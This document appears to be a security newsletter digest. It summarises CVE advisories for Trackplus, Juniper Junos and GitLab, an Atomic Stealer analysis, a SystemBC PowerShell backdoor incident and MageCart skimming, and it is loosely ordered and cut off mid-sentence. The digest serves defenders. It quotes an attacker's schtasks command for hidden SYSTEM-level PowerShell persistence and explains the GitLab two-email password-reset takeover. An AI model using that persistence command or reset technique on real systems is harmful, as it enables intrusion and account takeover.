Affected Component: Allegra Service Desk Module in Trackplus.
Exploitation Scenario: Attackers can execute arbitrary code on the affected system.
Mitigation: Organizations using Trackplus advised to apply patches promptly. CVE-2023-50164 impacts Trackplus versions susceptible to the vulnerability.
SystemBC PowerShell Backdoor Incident:
Incident Report: Discovery of a PowerShell backdoor orchestrated through SystemBC.
Attack Vector: Usage of PowerShell for stealthy and versatile malicious activities.
Detection and Response: Organizations encouraged to enhance PowerShell script visibility and deploy security measures to detect and mitigate SystemBC-related threats.
🚨 Vulnerability of the Week
Juniper Networks has addressed a critical pre-authentication remote code execution (RCE) vulnerability, identified as CVE-2024-21591, in Junos OS on SRX firewalls and EX switches. This vulnerability could allow an unauthenticated, network-based threat actor to execute a range of attacks, including denial-of-service (DoS), RCE, or potentially gain root privileges on exposed devices.
CVE ID: CVE-2024-21591
Vulnerability Type: Out-of-bounds write
Impact: Unauthenticated attackers could exploit this vulnerability to carry out DoS attacks, RCE attacks, or potentially gain root privileges.
Discovery: Discovered during external security research.
Affected Versions: The vulnerability affects the following Junos OS SRX Series and EX Series versions:
Junos OS versions earlier than 20.4R3-S9
Junos OS 21.2 versions earlier than 21.2R3-S7
Junos OS 21.3 versions earlier than 21.3R3-S5
Junos OS 21.4 versions earlier than 21.4R3-S5
Junos OS 22.1 versions earlier than 22.1R3-S4
Junos OS 22.2 versions earlier than 22.2R3-S3
Junos OS 22.3 versions earlier than 22.3R3-S2
Junos OS 22.4 versions earlier than 22.4R2-S2, 22.4R3
Patch Information: Juniper Networks has released patches for the vulnerability in the following Junos OS versions: 20.4R3-S9, 21.2R3-S7, 21.3R3-S5, 21.4R3-S5, 22.1R3-S4, 22.2R3-S3, 22.3R3-S2, 22.4R2-S2, 22.4R3, 23.2R1-S1, 23.2R2, 23.4R1, and all subsequent releases. Administrators are strongly advised to apply the patches immediately.
Mitigation Steps: In cases where immediate patching is not feasible, administrators are urged to take the following mitigation steps:
Disable the J-Web interface.
Allow access to the J-Web interface only from trusted hosts.
Current State: As of now, Juniper SIRT (Security Incident Response Team) is not aware of any malicious exploitation of this vulnerability. However, Censys reports over 10,000 exposed J-Web interfaces online, mainly in Asia (South Korea, Hong Kong, China) and the US.
🥵 Malware or Ransomware
RussianPanda’s latest blog post delves into the technical intricacies of Atomic Stealer, the first-known stealer targeting MacOS devices. Here are the key takeaways:
Discovery: Atomic Stealer emerged in March 2023, becoming the inaugural stealer designed for MacOS.
Monetary Model: Priced at $3000 per month, users gain access to the stealer’s panel by providing a Telegram Bot ID and build ID to the seller.
Functionality and Features:
Capabilities: The stealer boasts various functionalities, including keychain dumping, system information extraction, file grabbing (Desktop, Documents), MacOS password retrieval, a user-friendly web panel, MetaMask brute-forcing, crypto-checking for assets, and Telegram logs.
Supported Browsers: The stealer supports multiple browsers, including Chrome, Firefox, Brave, Edge, Vivaldi, Yandex, Opera, and OperaGX. Additionally, it targets various wallets and plugins.
Developer Identification: Cyble identified the Go source code path containing the username “iluhaboltov,” suggesting the developer’s name might be Ilya Boltov.
Evolution: A new version of Atomic Stealer surfaced in December 2023, encrypting all strings using XOR operations.
Anti-VM Measures: The stealer implements anti-VM checks, with commands like “system_profiler SPHardwareDataType” to identify virtual machines.
Data Collection: Atomic Stealer collects a range of data, including Chromium-based browser information, passwords, system details, and display configurations.
Encryption Algorithm: The new version utilizes XOR operations in a specific algorithm to encrypt strings, making the decryption process more intricate.
Detection Rules and Indicators of Compromise:
Yara Rules: The blog provides Yara rules for detecting Atomic Stealer.
Indicators: Indicators of compromise include hash values for old and new versions of Atomic Stealer, C2 server IP addresses, and other reference links.
During a recent engagement, a threat actor successfully installed the PowerShell version of SystemBC as a backdoor on the target system. Despite the different Command and Control (C2) address, the code matched a sample identified on VirusTotal . Subsequently, an Endpoint Detection and Response (EDR) product was deployed on the affected host(s) after the attacker created a malicious scheduled task. This task periodically executed the SystemBC PowerShell code.
EDR Detection Failure: Notably, the EDR product failed to identify the malicious code or its associated behavior. This underscores the importance of thorough investigation during Incident Response engagements, emphasizing the need to rely on more than just tool-based detection.
Incident Analysis: The attacker utilized the following command to create the scheduled task:
schtasks.exe /create /sc ONSTART /tn System /tr “Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -File C:\Windows\Tasks\svchost64.ps1” /ru system
This command provides opportunities for detection through various means, and the report outlines several techniques for identifying the backdoor and traces of its installation.
PowerShellReadLine Log: The exact command executed by the attacker is logged within the PowerShellReadLine file, offering an initial point of detection .
Velocidex Hunts: Using Velocidex, specific hunts can be conducted to identify the persistence created by the attacker. Examples include hunts from DetectRaptor.Windows.Detection.Evtx .
AutoRuns: As a widely-used tool, AutoRuns can be employed to identify the persistence listed under Task Scheduler, providing a straightforward detection method.
Windows System TaskScheduler: By filtering for the latest installed tasks and scrutinizing those running PowerShell scripts from uncommon locations, suspicious activity related to the backdoor can be identified.
🥷 TTP Analysis
The fashion and lifestyle brand, Khaadi, operating in Pakistan, Great Britain, and UAE, is currently experiencing an ongoing compromise with MageCart, a notorious web skimming group. The compromised URLs and exfiltration URLs have been identified.
Incident Details: MageCart is actively exploiting a web skimming attack, affecting numerous e-commerce websites, including Khaadi. The attackers employ different modus operandi through various threat groups, demonstrating a high level of sophistication.
Compromised over 40 e-commerce websites.
Data collected was encoded, encrypted, and sent to a Russian exfiltration server.
Some impacted websites did not remove the outdated script, contributing to the compromise.
Injected a Google Analytics lookalike script into home pages individually.
Loader script checks the checkout page, loading the skimmer only if necessary.
Custom version of a fake Google Analytics integration, similar to Group X.
Exfiltration to a different endpoint under the same domain.
Utilizes a similar methodology to Group Y and X.
Skimmer code undergoes modifications in script structure and server structure.
Exfiltration occurs to two domains, identifying the service used to disguise and the target website.
Web Skimmer Operation Insights:
Lack of website visibility into third-party scripts creates a security blind spot.
MageCart employs various tactics to inject skimming code, including disguising as discontinued libraries and injecting lookalike scripts.
Description: A critical vulnerability has been identified in the Allegra Service Desk Module of Trackplus, tracked as CVE-2023-50164. This flaw allows remote attackers to execute arbitrary code on affected installations. Although authentication is required, the default enablement of the guest account registration exacerbates the risk.
The vulnerability originates from a flaw within the struts core dependency. Exploiting this flaw, an attacker can initiate a directory traversal, leading to the execution of arbitrary code within the application’s context.
Vendor Response: Trackplus has promptly responded to this security issue by issuing an update. Users are strongly advised to apply the necessary patches to secure their installations. Detailed information about the update can be found in the vendor’s release notes at Trackplus Release Notes.
2023-12-21: Vendor silently patches the vulnerability.
2024-01-15: Public release of advisory.
Proof of Concept: A proof of concept demonstrating the vulnerability is available in the form of a Python script, accessible at src-2024-0001.py.txt. Organizations and security professionals are urged to use this POC responsibly for testing and remediation purposes only.
Credit: This critical vulnerability was discovered by Steven Seeley of Source Incite. The dedication of security researchers such as Steven is vital in identifying and mitigating potential threats.
The vulnerability is rooted in the mishandling of emails during password reset procedures. An attacker can exploit this by providing two email addresses, where the reset code will be sent to both. By specifying the email address of the target account and the attacker’s email, the attacker can reset the administrator password. GitLab notes that two-factor authentication (2FA) mitigates this vulnerability since an attacker, even after resetting the password, won’t be able to log in without the second authentication factor.
This vulnerability was discovered by asterion04.
Payload: The payload is demonstrated using two methods: